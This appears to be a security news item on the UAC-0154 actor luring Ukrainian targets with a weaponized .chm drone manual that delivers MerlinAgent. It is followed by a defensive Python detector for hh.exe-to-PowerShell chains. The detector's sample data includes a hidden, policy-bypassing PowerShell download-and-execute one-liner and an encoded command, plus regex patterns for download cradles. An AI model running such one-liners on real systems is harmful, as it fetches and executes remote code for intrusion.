AhnLab cybersecurity researchers: The malware is downloaded and executed from a WSF file within a compressed file, delivered via URL in phishing emails.
Ukraine is under attack with a fake drone manual. Securonix cybersecurity researchers: the UAC-0154 threat actor is spreading MerlinAgent in a .chm file, as it has done since July 2023
A Pilot-in-Command (PIC) drone manual has been used as a lure to deliver MerlinAgent by the UAC-0154 threat actor, Securonix cybersecurity researchers discovered. The bait is a .chm file (instructions written in Ukrainian for a DJI Mavic 3 drone) weaponized to execute a PowerShell one-liner on the victim machine and deploy the malware. The attackers also relied on complex TTPs and obfuscation methods to evade detection. CERT-UA has disclosed that one of the earliest uses of MerlinAgent dates back to the first half of July 2023, when Ukrainian government authorities were targeted by an email phishing attack with the subject “CERT-UA recommendations on MS Office program settings”. In that case too, the attachment was a weaponized .chm file.
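The CHM-to-PowerShell execution chain described above is something a defender can hunt for in process-creation telemetry. The following is an added Python example, not code from Securonix, CERT-UA or this article. It runs two checks over constructed Sysmon-style JSON records (the field names `host`, `parent_image`, `image` and `command_line` are an assumption about the log format): the Windows HTML Help viewer `hh.exe`, which is what opens .chm files, spawning a script host, and PowerShell launched with several of the flags typical of one-liner droppers (hidden window, no profile, execution-policy bypass, encoded command, download cradle). The sample records and the `PLACEHOLDER_URL` token are constructed for the example.

```python
import json
import ntpath
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1 records
# flattened to JSON lines. These are made-up samples for this example, not
# telemetry from the Securonix or CERT-UA reports; the URL is a placeholder.
SAMPLE_EVENTS = [
    r'{"host":"ws01","parent_image":"C:\\Windows\\hh.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -nop -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString(PLACEHOLDER_URL)"}',
    r'{"host":"ws02","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\hh.exe","command_line":"hh.exe C:\\Users\\analyst\\Desktop\\manual.chm"}',
    r'{"host":"ws03","parent_image":"C:\\Windows\\System32\\cmd.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="}',
    r'{"host":"ws04","parent_image":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","command_line":"powershell.exe -File C:\\scripts\\backup.ps1"}',
]

CHM_HANDLER = "hh.exe"  # Windows HTML Help viewer, the default handler for .chm files
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line traits commonly combined in PowerShell one-liner droppers.
# Any single one is legitimate on its own; it is the combination that matters.
EVASION_PATTERNS = {
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b"),
    "no_profile": re.compile(r"(?i)(?:^|\s)-nop(?:rofile)?\b"),
    "bypass_policy": re.compile(r"(?i)(?:^|\s)-e(?:xecution)?p(?:olicy)?\s+bypass\b"),
    "encoded_command": re.compile(r"(?i)(?:^|\s)-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}"),
    "download_cradle": re.compile(r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile)\b"),
}


def _basename(path):
    """Lower-cased file name of a Windows path; works on any host OS via ntpath."""
    return ntpath.basename(path or "").lower()


def evasion_indicators(command_line):
    """Return the names of every evasion pattern present in a command line."""
    return [name for name, pat in EVASION_PATTERNS.items() if pat.search(command_line or "")]


def analyze_event(event):
    """Apply both detection rules to one parsed event; return zero or more findings."""
    parent = _basename(event.get("parent_image"))
    child = _basename(event.get("image"))
    indicators = evasion_indicators(event.get("command_line", ""))
    base = {"host": event.get("host", "?"), "parent": parent,
            "image": child, "indicators": indicators}
    findings = []
    # Rule 1: the CHM viewer should never need to launch a script host.
    if parent == CHM_HANDLER and child in SCRIPT_HOSTS:
        findings.append({**base, "rule": "chm_spawns_script_host"})
    # Rule 2: PowerShell with two or more dropper-style traits on the command line.
    if child in POWERSHELL and len(indicators) >= 2:
        findings.append({**base, "rule": "powershell_evasion_flags"})
    return findings


def analyze(lines):
    """Parse JSON-lines telemetry and collect findings, skipping malformed records."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # a broken record should not stop the rest of the batch
        findings.extend(analyze_event(event))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f['rule']}] host={f['host']} {f['parent']} -> {f['image']} "
              f"indicators={f['indicators']}")
```

On the constructed sample, the ws01 record trips both rules (viewer-to-PowerShell chain plus four command-line traits), ws03 trips only the flag rule, and the benign records (a user opening a manual in the viewer, an admin running a script file) produce nothing. Rule 1 is the higher-fidelity signal and is worth alerting on by itself; rule 2 is better treated as a hunting query that is tuned per environment.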